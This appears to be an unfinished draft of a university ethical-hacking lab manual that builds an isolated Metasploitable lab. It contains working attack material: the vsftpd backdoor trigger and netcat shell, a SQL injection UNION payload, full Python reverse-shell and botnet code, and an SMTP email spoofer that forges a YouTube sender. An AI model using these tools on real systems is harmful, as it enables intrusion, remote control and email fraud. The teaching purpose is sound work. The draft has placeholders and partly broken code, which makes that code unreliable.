Daniel Graham

The Ethical HackingManual

Contents

List of Tables 5

List of Figures 7

1 Getting Setup 91.1 Introduction . . . . . . . . . . . . . . . . . . . . 91.2 Setting Up Metasploitable . . . . . . . . . . . . . 91.3 Starting Kali Linux . . . . . . . . . . . . . . . . 11

1.3.1 Getting the IP address of the metasploitableserver . . . . . . . . . . . . . . . . . . . . 16

1.4 Your First Hack . . . . . . . . . . . . . . . . . . 18

2 Armitage: Easily Identify and Exploit Vulnerabili-ties 212.1 Background . . . . . . . . . . . . . . . . . . . . . 212.2 Vulnerability Scanning Using Armitage . . . . . 212.3 Exploiting a host using Armitage . . . . . . . . . 25

3 SQL Injection 293.1 Background . . . . . . . . . . . . . . . . . . . . . 293.2 Your first manual SQL injection attack . . . . . 30

3.2.1 Background . . . . . . . . . . . . . . . . . 303.3 Using SQLMap . . . . . . . . . . . . . . . . . . . 323.4 Background. . . . . . . . . . . . . . . . . . . . . 32

4 Reverse shell & BotNet 354.1 A reverse Shell Client. . . . . . . . . . . . . . . . 364.2 Reverse Shell Server . . . . . . . . . . . . . . . . 374.3 Running the reverse shell . . . . . . . . . . . . . 384.4 Botnet . . . . . . . . . . . . . . . . . . . . . . . 38

1

2 0 Contents

5 Wireshark Part 1: Networking Crash Course 415.1 Introduction . . . . . . . . . . . . . . . . . . . . 415.2 Setting up . . . . . . . . . . . . . . . . . . . . . 415.3 Need to make this clearer. . . . . . . . . . . . . . 43

6 Wireshark Part 2: Analyzing Malware Traffic 456.1 Introduction . . . . . . . . . . . . . . . . . . . . 456.2 Importing PCAP files into wireshark . . . . . . . 45

7 SMTP enurmeration & email spoofing 477.1 Email Spoofing . . . . . . . . . . . . . . . . . . . 48

8 Arp Spoofing 51

9 Open Source Intelligence 539.1 Introduction . . . . . . . . . . . . . . . . . . . . 539.2 WhoIs . . . . . . . . . . . . . . . . . . . . . . . . 539.3 The Harvester . . . . . . . . . . . . . . . . . . . 549.4 Maltego: . . . . . . . . . . . . . . . . . . . . . . 549.5 List of comprised passwords. . . . . . . . . . . . 55

10 Creating and Infected File 5710.0.1 Capturing image from the camera. . . . . 57

10.1 Creating Malicous Files for Windows . . . . . . . 5710.2 Greating a malicious Android APK. . . . . . . . 5710.3 EggShell IOS payload . . . . . . . . . . . . . . . 58

11 Communicating Securing 59

12 Tor and Dark Web 6112.1 Background . . . . . . . . . . . . . . . . . . . . . 6112.2 Setting up Tor virtual Machine . . . . . . . . . . 6112.3 Annoymous Browsing . . . . . . . . . . . . . . . 62

13 Metasploit 6313.1 Background . . . . . . . . . . . . . . . . . . . . . 6313.2 Using Exploits . . . . . . . . . . . . . . . . . . . 6313.3 Hide metrepreter process by migrating it. . . . . 6413.4 Exploring the file system . . . . . . . . . . . . . 64

0.0 Contents 3

13.5 Key Logging . . . . . . . . . . . . . . . . . . . . 6513.6 Writing a SSL Client . . . . . . . . . . . . . . . 6813.7 Challenge . . . . . . . . . . . . . . . . . . . . . . 69

14 Moving through the network 71

15 Writing Malicous Javascript 7315.1 Obfuscating Code . . . . . . . . . . . . . . . . . 7315.2 R Markdown . . . . . . . . . . . . . . . . . . . . 7315.3 Including Plots . . . . . . . . . . . . . . . . . . . 7415.4 R Markdown . . . . . . . . . . . . . . . . . . . . 74

List of Tables

5

List of Figures

1.1 Networking environment . . . . . . . . . . . . . . 101.2 Screen shot of virtual box image . . . . . . . . . . 111.3 Screen shot of adding a new Nat Network . . . . 121.4 Screen shot of configuring metasploitable Nat Net-

work . . . . . . . . . . . . . . . . . . . . . . . . . 131.5 Kali Linux Log-in Screen . . . . . . . . . . . . . . 151.6 Metasploitable Virtual Machine After it has been

started . . . . . . . . . . . . . . . . . . . . . . . . 151.7 The figure above shows the output of the netdis-

cover tool and the IP address of the metasploitablemachine . . . . . . . . . . . . . . . . . . . . . . . 16

1.8 The figure above shows terminal contain the IP-address of the machine . . . . . . . . . . . . . . . 17

1.9 Screen shot of metaploitable in kali linux browser 18

2.1 Armitage Setup Screen . . . . . . . . . . . . . . . 222.2 Armitage Screen Starting Screen . . . . . . . . . 232.3 The figure show an example of running the quick

scan . . . . . . . . . . . . . . . . . . . . . . . . . 232.4 The figure above shows how to execute the vftpd

vulnerability . . . . . . . . . . . . . . . . . . . . . 252.5 The figure above shows the description of the attack 262.6 The figure above shows how to get shell access. . 27

3.1 The figure above shows the security level set to low 31

4.1 The figure above shows how to get shell access. . 35

5.1 An annotated screen shot of the wireshark window 415.2 An annotated screen shot of the wireshark window 425.3 Filtering Packets on Wireshark . . . . . . . . . . 43

7

8 0 List of Figures

5.4 TCP conversation filtering . . . . . . . . . . . . . 435.5 Navigating to follow TCP stream on Wireshark . 445.6 A screenshot of Follow TCP stream on Wireshark 44

8.1 Shows the Shows the topology of the virtual lab youconfigured . . . . . . . . . . . . . . . . . . . . . . 51

#Preface This book is design as step by step guide to help intro-duce you to penintration testing. This book focus on the breakinginto Linux systems but the tools and techiniques dicussed in thisbook can be extended to Windows Systems.

##Research Assistants: Onyi Uche: Testing and Figures

##Chapter Contributions: Ahmed Ibrahim: SSL & TLS stripping.

1Getting Setup

“A journey of a thousand miles begins with a single step.” - Lao Tzu

1.1 IntroductionWelcome to your first step in your hacking journey. In this sectionwe will setup your lab environment. In particular, we will setuptwo virtual machines:

• Metasploitable Virtual Machine: The machine that youwill hack.

• Kali Linux Virtual Machine: The machine that containsthe hacking tools discussed in this book.

Since it is illegal to hack machines that you don’t own we needto setup a virtual networking environment that we can hack. Thefigure belows show the an overview of the networking environmentand how the two virtual that you will create a connect to virtualwhich with is then connect to your actual network. Becuase thesemachine are behind the virtual switch. Outsider attacks will notbe able to get to your the Metasploitable Virtual Machine. Thistherefore creates an isolated environment for you to hack in.

1.2 Setting Up MetasploitableIn this section we will setup the Metasploitable VM.

9

10 1 Getting Setup

FIGURE 1.1: Networking environment

Step 1: Download the the Metasploitable2 virtual machine fromsourceforge https://sourceforge.net/projects/metasploitable/ Although there are new versions of Metasploitable available,we will be using this version because it is easier to setup.

Step 2: Unzip the metasploitable virtual machine.

Step 3: Download Virtual Box. https://www.virtualbox.org/wiki/Downloads. We will be using Virtual Box because it freefor : Linux, Mac OS and Windows Machines

Step 4: Install Virtual Box. (Install the Oracle universal bus)

Step 5: Configure your virtual box network settings (Adding anew NAT Net- work). NAT stands for Network Address Transula-tion. Go into your network preferences by clicking on File→Pref-erences→Network. Click on the little green box to the right to adda new NAT Network and then click OK.

1.3 Starting Kali Linux 11

FIGURE 1.2: Screen shot of virtual box image

Step 6: Configure the metasploitable machine network settings.Right click on the metasploitable machine from your list of ma-chines on the left →Settings→Network. On Adapter 1, check the’Enable Network Adapter’ box and set ’Attached to’ from the drop-down menu to Nat Network. Leave name as NatNetwork and clickOK.

Step 7: Open the metasploitable virtual machine in the OracleVM Virtual Box Manager.

1.3 Starting Kali LinuxYou will also need to install Kali Linux in the virtual machine.Kali Linux is a distribution of Linux that contains a collection ofpenetration testing tools.

Step 1: You can download the Kali Linux virtual image from ht

12 1 Getting Setup

FIGURE 1.3: Screen shot of adding a new Nat Network

tps://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/. You will need to download theversion suitable for your system.

1.3 Starting Kali Linux 13

FIGURE 1.4: Screen shot of configuring metasploitable Nat Net-work

14 1 Getting Setup

Step 2. Add the Kali machine to VirtualBox by clicking Machineand then new. Choose a name for the machine, perhaps “Kali”,change the type to Linux, and change the version to other Linux(64 bit). Use the recommended memory size and continue. On thenext screen select use an existing virtual hard disk file, find yourvirtual box download and then click create.

Step 3: Configure the Kali Linux machine network settings. Rightclick on the Kali Linux machine from your list of machines onthe left→Settings →Network. On Adapter 1, check the ’EnableNetwork Adapter’ box and set ’Attached to’ from the drop-downmenu to Nat Network. Leave name as NatNetwork and click OK.

Step 3: Open the Kali Linux virtual machine in the Oracle VMVirtual Box Manager.

Kali Linux black screen problem… make sure PAE/NK box ischecked in Settings -> General -> Processors. If problem persistsfol- low the fix tutorial at https://community.linuxmint.com/tutorial/view/ ‘

Step 4: Once your machine starts, you should see the Kali Linuxlogin screen below. Log-in in using the username: root and pass-word: toor

Step 5: Now that your Kali Linux machine is up and running,you will also need to launch your metasploitable virtual machineso that you can attack it. Select Metasploitable Virtual Machinefrom the list in the Oracle VM Virtual Box Manager

Step 6: Wait for the terminal to finish loading. Your virtual ma-chine should display the metasploitable logo. ( IMPORTANT:Your mouse pointer my disappear, this is because the VM hascaptured it. Press the Ctrl+Alt keys together to get your mouseback)

Step 7: Log-in in using the username: msfadmin and password:msfadmin

Great you have now successfully setup your environment. Let’s

1.3 Starting Kali Linux 15

FIGURE 1.5: Kali Linux Log-in Screen

FIGURE 1.6: Metasploitable Virtual Machine After it has beenstarted

16 1 Getting Setup

execute your first hack. Each hack in this manual will start witha goal. For example the goal for this exercise is:

Goal:Gain access to metasploitable server

1.3.1 Getting the IP address of the metasploitable server

The first step of most hacks is identifying the machine that we want toconnect to. Each machine is identified by a unique IP address. In thissection we will discover the IP address of the metasploitable server.

Step 1: Open the terminal on your Kali Linux machine by clickingthe icon in top section of the menu.

Step 2: Type the following command netdiscover. The netdiscovertool searches multiple IP addresses on your network in an attemptto discover which ones are currently being used. This tool lets yousee all the the machine that are currently connect to the sameLocal Area Network (LAN).

Step 3: After a couple of minutes netdiscover should have dis-covered the metas- ploitable server and its IP address. (IMPOR-TANT: This IP will be different for everyone. You needuse the IP Address that is output in your terminal. Notthe one from the picture. ) Great now that you have the IPAddress you should be able to visit the Web pages that server ishosting.

FIGURE 1.7: The figure above shows the output of the netdis-cover tool and the IP address of the metasploitable machine

Step 4: If you are unable to discover the IP address of the Metas-ploitable virtual machine using the steps above. You can login tothe machine using the username: msfadmin and password: msfad-min.

1.4 Starting Kali Linux 17

FIGURE 1.8: The figure above shows terminal contain the IP-address of the machine

Step 5: Once you have logged into the machine. Type the followingcommand into the terminal:

ifconfig

You will see the IP address under an inet addr for the 'eth' (Ethernet)portion of the output. Do not go with the ’lo’ (Link loopback) inetaddr. For example under the ’eth’ portion, you could have ’inet addr:10.0.2.4...’ In this case, 10.0.2.4 is the IP address that you want. Referto Figure 1.

Step 6: Open the Kali Linux web browser

Step 7: Type the IP address that you obtained from netdiscoveror metas- ploitable’s ifconfig output into the URL bar [Is thatwhat you call it]. For example, if the metasploitable_IP_addressthat was output on my terminal is 10.0.2.4, then in my Kali Linuxbrowser I would put the following: http://10.0.2. You shouldsee the page in Figure 1.9:

18 1 Getting Setup

FIGURE 1.9: Screen shot of metaploitable in kali linux browser

1.4 Your First HackThe way hackers gain access to machines is through vulnerabili-ties. You can think of these vulnerabilities as open doors to yoursystem. Hackers leverage these open doors (vulnerabilities) to gainaccess to systems. The metasploitable server has a ftp vulnerabil-ity (described below). In this sec- tion of the lab you will exploitthis vulnerability to gain access to the server.

Vulnerability:The Vulnerability that we are going to exploit in this lab is a “back door”. A back door is an intentional flaw that was addedto a system by an attacker that allows the attacker to gain access. In particular we are going to look at a vulnerability that was added by amalicious developer to an open source UNIX ftp server called vsftpd.The back door allowed the attacker to gain access to the terminal on thevulnerable machine. The attack was activated when the attacker logged into the FTP using ausername ending in :) and an invalid password. Once the attacked wasactivated it opened a reverse shell on port 6200.

Reverse Shell: A reverse shell is a malicious program that con-nects to an attacker’s machine, allowing the attacker to execute terminalcommands on the compromised machine. In a later lab we will write a

1.4 Your First Hack 19

reverse shell.

Background A FTP (File Transfer Protocol) server is programthat allows user to upload and download files from a machine.

Step 1: Connect to the FTP server using telnet. Open the termi-nal on your Kali Linux Machine and type the following command.Remember to add port number towards end: [Important telnet isan old technology no backspace]

root@kali: telnet [IPAddress of Your Metasploitable VM] 21user Hacker:)331 Please specify the password.pass invalidConnection closed.

** Background ** This is a part of an vulnerable that was placein the open source FTP server, by unknow hacker. This hackedcreated this vulnerability by modifying the opensource code forthe vsFTP server, to include a check for :) in the username field ifa user included a :) in the username the backdoor was activitated.So you might be wandering. What is a backdoor. A backdoor isa program, that and attacker places on a machine that gives thehacker acceess to that machine’s terminal. In the step above, theattacker is activating the backdoor. In the subsequent steps theattacker connecting to the backdoor running on port 6200 andissuing command to the terminal.

Step 2: Now that you activated the back door you can now loginto get access to the terminal (Get Shell). By connecting to the“backdoor” that is running on 6200. Connect the backdoor usingnetcat. And use the linux ls command to list all of the files on themachine

root@Kali: nc [IPAddress of venerable Machine] 6200idls

Notice that it executes the ls command in the terminal of the com-promised machine and returns the directory listing on the machine.Do you notice anything about the contents of the directory?

20 1 Getting Setup

[TODO: request: Save funny image in virtual machine]

We have hidden a secret image in the file system on the metas-ploitable server. Now that you have access to the server’s file sys-tem. See if you can find the secret image. Once you have foundthe secret image, let the Ethical Hacking Lab Community knowby tweeting it ?

Fix: So how do we fix this vulnerability. Newerversions of vs- ftpd ftp server, have identified andpatched these vulnerabilities, so the best way tosecure this server is an updated version of vsftpd.sudo apt−get update vsftpd(The metasploitable machineis designed to be vulnerable so it not configured tosupport updates.)

2Armitage: Easily Identify and ExploitVulnerabilities

Technology is nothing. What’s important is that you have a faith inpeople, that they’re basically good and smart, and if you give themtools, they’ll do wonderful things with them . - Steve Jobs

2.1 BackgroundGreat so we can use netdiscover to find machines. But how do weknow what vulnerabilities exist on these machines? In the previ-ous lab we told you what vulnerabilities existed, but how do youdiscover and exploit these on your own. This is where Armitagecomes in, Armitage is a GUI interface for Metasploit (a tool wewill look at in a later lab). Armitage allows you easily scan hostsfor vulnerabilities and exploit these vulnerabilities with only a fewclicks.

2.2 Vulnerability Scanning Using ArmitageGoal:Scan the Metasploitable host for vulnerabilities and exploit onethese vulnerabilities to gain access to the machine.

Step 1: Start the metasploitable server by clicking on the virtualbox icon and select. Select the Metapsloitable virtual machine andpress the play button.

Step 2: Click on the Armitage icon.

21

22 2 Armitage: Easily Identify and Exploit Vulnerabilities

Step 3: You should see the setup screen show below. Click connect.

FIGURE 2.1: Armitage Setup Screen

Step 4: If you get a pop up asking you start Metasploit RPCserver. Click Yes. (Armitage communicates with Metasploit usingthe RPC server). If everything is working, well you should get thefollowing screen.

Step 5: Once you have successfully setup Armitage, you will needto discover the machines that you would like scan for vulnerabili-ties. You can do this using the netdiscover tool from lab one. Oryou can use armitage discovery tool. Click on Hosts→Scan→QuickScan OS Detect.

Step 6 To ensure that we don’t attack unintented machines onour network we will manual add the ip-address our metasploitablemachine to our armitage workspace.

Step A: You will get a pop up that asks you for the range ofIP Addresses that you want scan. This takes IP Address in Cidarnotation, for example 192.168.1.0/24. IP Version 4 Address are 32bit address. This notation means that you should keep the first 24bits static and vary the remaining 8 bits to search for hosts. Enter

2.2 Vulnerability Scanning Using Armitage 23

FIGURE 2.2: Armitage Screen Starting Screen

FIGURE 2.3: The figure show an example of running the quickscan

24 2 Armitage: Easily Identify and Exploit Vulnerabilities

the following IP Address range in the box.[Your-Ipddress]/24. Re-member from the first lab that it possible to get your IP-addressby running the Ipconfig command.

Step B: Once your scan has completed you noticethat Armitage has discovered the metasploitable host.

Step 7 You will notice that one of the machines as the sameaddress and the metasploitable host from the first lab. Write clickon this machine and select scan. Once you have completed the scanyou will see a list of open ports on the machine.

Step 8: Now that we have discovered some hosts and some openports the ports. Let’s scan them for vulnerabilities. Click on thehost that you want to scan. It will be highlighted by a green box.The click on Attacks→find Attacks.

A Hail Mary Attack tries every attack in an attempt to break into tothe system.

Step 9: Once vulnerabilities scan has completed you will see theexploitable vulnerabilities by right clicking on the host and select-ing Attacks. The image below shows the ftp attack from our firstlab.

2.3 Exploiting a host using Armitage 25

FIGURE 2.4: The figure above shows how to execute the vftpdvulnerability

2.3 Exploiting a host using ArmitageStep 1: Click on the ftp attack. This will show you a descriptionof the attack.

When Armitage attacks a host it uploads a play-load that allow youto control the host. This payload needs to be configured so that it canconnect to your machine so you can control it and in turn control theinfected host.

Each parameter in the table shown in the figure above is explainedbelow

• LHOST : The IP Address of the controlling machine• LPORT : The port on the controlling machine.• RHOST : The IP Address of the host being attacked.

26 2 Armitage: Easily Identify and Exploit Vulnerabilities

FIGURE 2.5: The figure above shows the description of the at-tack

• RPORT : The port used by the payload

In a Reverse Connection The attacked host will start the connec-tion

Step 2: Click launch to launch the attack. Once you host iscomprised the host icon will change to

Step 3: You can now get shell access on the machine by rightclicking on the host and selecting shell1→interact. A Linux shellwill appear in the bottom section of Armitage.

2.3 Exploiting a host using Armitage 27

FIGURE 2.6: The figure above shows how to get shell access.

Step 4 You should terminal open up at the bottom on the window.Type the ls command in this window.

Step 5: We have hidden a file in Metasploitable server calledlevel002.txt. See if you can read the contents of file. It you areable to find this post the content to our Facebook wall.

Fix:Patch, Patch, Patch. The way to prevent attacks like the one aboveis ensure that your software is always update. So that the system doesnot contain any known vulnerabilities.

3SQL Injection

“For the want of a nail the shoe was lost, For the want of a shoethe horse was lost, For the want of a horse the rider was lost, Forthe want of a rider the battle was lost, For the want of a battle thekingdom was lost, And all for the want of a horseshoe-nail.”- Benjamin Franklin

3.1 BackgroundIn the previous lab we looked at the vsftpd ftp backdoor vulner-ability that was maliciously injected into an open source imple-mentation of a ftp server by hackers. What operating system orservices on machines don’t have any vulnerabilities? Then how doyou get access to machine? The Answer: through the web apps.

In this lab we will look at SQL Injection which is a vulnerabilitythat occurs when software developers incorrectly process parame-ters that are used in SQL queries. SQL is a language that is usedto query tables in a database. For example, the following queryreturns the first and last name for the user whose Social SecurityNumber is 555-5555-5555.

SELECT firstname, lastname from Users where SSN = ‘555-5555-5555’;

To allow for more generic queries a programmer might replace thehard- coded SSN value of 555-5555-5555 with a variable$ id.

29

30 3 SQL Injection

SELECT firstname, lastname from Users where SSN = ‘$id’;

This would allow the program to return the first name and lastname for any value of$ id

Vulnerability:Since the program is simply inserting the command stringinto the SQL query, a hacker can edit the query by injecting her own. Forexample if the hacker sets the value of = `UNION SELECT username,password from users where ‘’ = ’ injecting this for value for id will resultin following query:

SELECT firstname, lastname from Users where SSN = ‘’ UNIONSELECT username, password from users where ‘’ = ‘’;

The query SELECT firstname, lastname from Users where SSN =‘’ will not return anything since there are no entries in the tablewith blank SSNs. This result will then be unioned with the resultof the second query which returns the username and password forall entries of the users since all enteries match the requirement ‘’= ‘’.

3.2 Your first manual SQL injection attackGoal:Use SQL injection to obtain the username and password for user ofDVWA (Dam Vunerable Web App) running on the metasploitable server.

3.2.1 Background

The Dam Vunerable Web App (DVWA) is a web application thatwas built to showcase common web vunerablity. Before we canexploit the vulnerable we need to place the web app in a vunerablestate. The DVWA is running on the metasploitable machine. Sowe to connect the machine and place the app in the vunerablestate before we begin, the SQL injection attack.

3.4 Your first manual SQL injection attack 31

Step 1: Start up your metasploitable virtual machine and get itsIP address using ifconfig command. Type this IPaddress into thebrowser.

Step 2: Login to DVWA using username: admin and password:password.

Step 3: Click on the DVWA Security tab

Step 4: Set the security level to low.

FIGURE 3.1: The figure above shows the security level set tolow

Step 5: Click on the SQL Injection tab.

Step 6: Execute a sample SQL injection attack. (need to say morehere)

32 3 SQL Injection

3.3 Using SQLMap

3.4 Background.Now that we have place DVWA in a vunerable state. We can nowuse a project called SQL map to perform SQL injection on the webapp. This is a tool that is commonly used by attackers.

Step 1: Navigate to the SQL injection section tab in DVWA Linux

GOAL: We want to capture the URL that is associated with the SQLinjection.

Step 2: Open Developer Console by Clicking Ctrl-Shift-I. Clickon the network tab. (This will allow us to capture the request.We could also use a proxy for this)

Step 3: Enter the value 1 in UserID box and click submit. Entera sample request.

Step 4: Select the GET request that was associated with thesubmission and retrieve the url.

Step 5: You will also need the cookies that are associated with therequest when submitting the form. The cookie can be found in theget request, within the cookie tab, or by inserting the command“document.cookie” in the web console.

Step 6: To start SQLmap got to Applications→Database Assess-ment→SQL Map

Step 7: Start SQLmap.

Step 8: Point SQL map at the URL discovered, with the cookie,from your earlier capture as shown below

3.4 Background. 33

Select yes to the options below.From our earlier test we know that ID parameter was vulnerable. So wewill stop our search here.Take a look at some of the payloads: Pretty creative right.

4Reverse shell & BotNet

##Introduction: In this lab we will learn the basics of socket pro-gramming by implementing a reverse shell. We then show how thisreverse shell can be extended and be used to implement a simplebotnet.

###Sockets and process communication A socket is a softwareabstraction that allows programs to communicate over then net-work. There are two types of sockets that are commonly used: 1)TCP socket and 2) a UDP socket. TCP sockets ensure that allthe data that sent over is reliablity dilivered over network. TCPsockets are commonly used for file transfer and other applications.UDP sockets trade reliability for speed. Common applications thatuse UDP are audio or video applications. In lab we will used TCPsockets.

FIGURE 4.1: The figure above shows how to get shell access.

###Reverse Shell A reverse shell is a program that is comprised

35

36 4 Reverse shell & BotNet

of the two parts: - A communication component that connectsto the attackers computer. This were the “reverse” part of namecomes from since the program is connecting to the attackeres com-puter and not the other way around. - The second componentis a Shell component which allows the attacker to execute shellcommands on the victims machine and read the result of the com-mands.

##Setting Up Your Python Environment: We will be developingour reverse shell in python. So you will need to setup a pythondevelopment environment.

Step 1 Open the

Step 2 Save the blank file by clinking File → SaveAs client.py(Save the file to your Desktop this will just make it easier to findlater in the lab)

4.1 A reverse Shell Client.Step 3 The code below creates simple TCP socket.

import subprocessfrom socket import *serverName = args[1]serverPort = 8000clientSocket = socket(AF_INET, SOCK_STREAM)clientSocket.connect((serverName, serverPort))clientSocket.send('Bot reporting reporting for duty'.encode())command = clientSocket.recv(4064).decode()

while command != "exit":result = subprocess.run(command.split(" "), stdout=subprocess.PIPE)message = result.stdoutclientSocket.send(message)command = (clientSocket.recv(4064)).decode()

4.3 Reverse Shell Server 37

clientSocket.close()

** Step 4 ** Create a folder called “botnet” on your Kali Desktop.Save the file above as “clientBot.py”

4.2 Reverse Shell ServerStep 5 Now we will write the server that runs on the attackersbox.

from socket import *serverPort = 8000serverSocket = socket(AF_INET, SOCK_STREAM)serverSocket.bind(('', serverPort))serverSocket.listen(1)print("Attacket Box Listening and awaiting instructions")connectionSocket, addr = serverSocket.accept()print("Thanks for connecting connecting to me bot "+str(addr))message = connectionSocket.recv(1024)print(message)command =""while command != "exit":

command = input("Please enter a command: ")connectionSocket.send(command.encode())message = connectionSocket.recv(1024)print(message)

connectionSocket.close()

Step 6 Save the file as “serverBot.py” to the “botnet” the Desktopfolder you created earlier.

38 4 Reverse shell & BotNet

4.3 Running the reverse shellWe have placed a copy of the botnet client on the metasploitablevirtual machine. Normally use a know vulnerability to get accessto a machine as saw during the Armitage lab.

Step 7 Start the botnet by opening the terminal and navigating tofolder called botnet on kali desktop. Run the file by typing pythonserverBot.py

[Include screen shot below]

Now the server bot is running an waiting for the clients to connectto it. So let’s activate the botnet client.

Step 8 Log into the metasploitable machine using username: ms-fadmin, password msfadmin.

Step 9 Cd into the folder called botnet can run the botnet clientby typing: python clientBot.py [Ipaddress of your Kalibox]. (Re-member that you can get the ip-address of the Kali linux box byusing the ifconfig command)

[Include a picture and place botnet client on Armitage machine]

Step 10 Your client bot should now be connected to your server-bot. Try executing a whoami command.

[Include a picture]

4.4 BotnetThe example above discusses a single client server pair. How wouldwe extend so that a single machine could control serveral clientsall at once. This is exactly what happens in a botnet serveral clientmachines will connect to a single machine call the botnet master.This machine will then send commands to all of the machines

4.4 Botnet 39

(bots) which have connected to it. The code below shows how wewould extend the server to handle multiple client bots

from socket import *serverPort = 8000serverSocket = socket(AF_INET, SOCK_STREAM)serverSocket.bind(('', serverPort))serverSocket.listen(10) #Ten Bots maxprint("Attacket Box Listening and awaiting instructions")print("Thanks for connecting connecting to me bot "+str(addr))print(message)command =""while command != "exit":

connectionSocket, addr = serverSocket.accept()message = connectionSocket.recv(1024)command = input("Please enter a command: ")connectionSocket.send(command.encode())message = connectionSocket.recv(1024)print(message)connectionSocket.close()

5Wireshark Part 1: Networking Crash Course

5.1 IntroductionComputers communicate over the network using packets. Thismeans that if we can intercept or spoof these packets we can learnalot about the user and their network traffic.

In this lab you will get introduced to Wireshark. Wireshark isnetworking tool that allows you to capture all of the the outgoingand incoming packets from your machine.

5.2 Setting upStep 1 Open Wireshark by clicking the shark-fin icon on the kalilinux tool bar.

FIGURE 5.1: An annotated screen shot of the wireshark window

Step 2 Click the eth0 interface to start the capture.

Step 3 Press the shark-fin icon (in the top left) to start the processof capturing packets.

Step 4 There are three main screens in wireshark. The figurebelow shows an annonated screenshot of three wireshark screens.

41

42 5 Wireshark Part 1: Networking Crash Course

FIGURE 5.2: An annotated screen shot of the wireshark window

##Analyzing Network Trafffic Step 5 Wireshark let’s you cap-ture packets from your own machine. This is a great tool for digitalforensics, capturing traffic from an infected machine and analyzingwhat is currently happening on the machine.

Step 6 Open the firefox app and visit http://www.cs.virginia.edu.

Step 7 Click the red stop icon to stop the packet capture.

Step 8 Since there are so many packets in the wireshark cap-ture. They have built a great feature that allows you to filterpackets. Click on the filter packets box at the top of screen andtype the following filter command ip.dst==128.143.67.11 (Where128.143.67.11 is the Ip address of cs.virginia.edu websever)

Step 9 Limit the packet capture to only one conversation byright clicking on one of the packets and selecting conversation filter->TCP.

Step 10 Wireshark also let’s you reconstruct the stream data fromthe packet stream by clicking on packet selecting follow->TCPstream. You should see the html conresponding the page.

5.3 Need to make this clearer. 43

FIGURE 5.3: Filtering Packets on Wireshark

FIGURE 5.4: TCP conversation filtering

The Follow TCP Stream will look like the figure below:

5.3 Need to make this clearer.Need to make this section of the clearer.

44 5 Wireshark Part 1: Networking Crash Course

FIGURE 5.5: Navigating to follow TCP stream on Wireshark

FIGURE 5.6: A screenshot of Follow TCP stream on Wireshark

6Wireshark Part 2: Analyzing Malware Traffic

6.1 IntroductionIn this section we will analyze network traffic from an infectedmachine. The goal of this section is analyze wireshark pcap fileand identify when a machine was compromised.

In particular we will look at two types of attacks, and arp spoofingattack and dns attack.

6.2 Importing PCAP files into wiresharkStep 1 Load the pcap file from Download the Pcap file from ourgithub page.

[link to wireshark capture]

Step 2 Open wireshark by clicking the on the fin

Step 3 Open the file pcap file by selecting file -> open and navi-gating to the directory containing the pcap file.

#Scanning the Step 1 Upload the wireshark capture to packettoday. https://packettotal.com/. Packet total will scan thepacket for malicious activity. (Does alot of heavy lifting for us)

Step 2 Click on the malicous activities tag.

[Screen shot highligthing the entry corresponding to meterpreter]

Step 3

45

46 6 Wireshark Part 2: Analyzing Malware Traffic

**

7SMTP enurmeration & email spoofing

##Background For this lab you are going to attempt to build anemail address spoofer that implements the STMP protocol overTCP. Modern Email servers have several solutions to make it moredifficult to spoof emails. However, the STMP protocol itself doesnot check to ensure that the message is coming from a valid serveror that email was actually created by the sender. To demonstratethis, we will setup up a metasploitable server.

##SMTP enumeration In an SMTP enumeration attack an at-tacker try get a list of valid email addresses from a server. Kalilinux has

Step 1 determine the ipaddress of the metasploitable machineusing the ipconfig command. Username: msfasdmin password ms-fadmin

Step 2 Start the metasploit console. Select smtp_enum moduleby typing the following

msf > use auxiliary/scanner/smtp/smtp_enum

Step 3 Set the host that you want to scan by typing the follow-ing. Replace the xxx.xxx.xxx.xxx ip-address with IP-address of themetasploitable machine

msf auxiliary(smtp_enum) > set RHOSTS xxx.xxx.xxx.xxx

RHOSTS => 192.168.1.56

msf auxiliary(smtp_enum) > run

You should see a list of users on the server.

[Include screenshot below]

47

48 7 SMTP enurmeration & email spoofing

An attacker could you use an SMTP enumeration attack to getthe email address that are available on the server. In the followingsection we develop software required to execute an SMTP attack.

7.1 Email SpoofingStep 1. Download the free version of vmplayer. (You can also usevirtual box if you already have it installed or just like it more.)

Step 2. Connect to the metasploitable server via telnet.

telnet xxx.xx.xx.x 25

where xx.xx.xx.x is the IP address of the metasploitable server.

Remember that you can get the address of the metasploitableserver by login: username msfadmin and password msfadmin

The metasploitable webserver will now let you communicate withit via telnet. (Not encrypted fun for snooping)

Step 3 Follow the STMP communication protocol process to sendan email to from the hacking@virginia.edu1 (The figure belowshows the results of process)

Great, now that we have a mailserver that is configured and wecan communicate with. Let’s go ahead write a TCP applicationthat will allow us to implement the process for us.

Step 4 Open the ide

The code below shows an implementation of the program thatexecute the SMTP protocol over a TCP connection

import sys, socket

size = 1024

1mailto:hacking@virginia.edu

7.1 Email Spoofing 49

def sendMessage(smtpServer, port, fromAddress, toAddress, message):IP = smtpServerPORT = int(port)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((IP, PORT)) # Open socket on portprint(s.recv(size).decode()) # display responses.send(b'HELO virginia.edu\n') # Send HELO fake.frprint(s.recv(size).decode()) # display responses.send(b'MAIL FROM:<' + fromAddress.encode() + b'>\n') # send MAIL FROM:print(s.recv(size).decode()) # display responses.send(b'RCPT TO:<' + toAddress.encode() + b'>\n') # send RCPT TO:print(s.recv(size).decode()) # display responses.send(b"DATA\n") # send DATAprint(s.recv(size).decode()) # display responses.send(message.encode() + b'\n') # send messages.send(b'.\n')print(s.recv(size).decode()) # display responses.send(b'QUIT\n') # send QUITprint(s.recv(size).decode()) # display responses.close()

def main(args):smtpServer = args[1]port = args[2]fromAddress = args[3]toAddress = args[4]message = args[5]sendMessage(smtpServer, port, fromAddress, toAddress, message)

if __name__ == "__main__":main(sys.argv)

50 7 SMTP enurmeration & email spoofing

Step 5 Create a folder called spoofer on the Kali desktop and savethe program above to the folder and call it espoofer.py

Step 6 Open the terminal and cd to ~/Desktop/spoofer

Step 7 Run the spoofer by typing the following commands intothe termainal on the shell.

python espoofer.py [IP-Metasploitable] 25 admin@youtube.com sys Hello From the other side

[Include screen shot]

##Checking to see that email was correctly recieved.

Step 1 Login into the metasploitable server. Username: msfadminPassword: msfadmin

Step 2 Open the terminal and check sys mailbox on the mailserver by typing

sudo cat /var/spool/mail/sys

[Include a screen shot below]

8Arp Spoofing

##Background In this lab we will discuss arp spoofing. Arp spoof-ing is attack it which an attacker tricks a victim into believing thatthey are another machine, by pretenting that their MAC addressmaps to ipaddress that is not their own.

FIGURE 8.1: Shows the Shows the topology of the virtual labyou configured

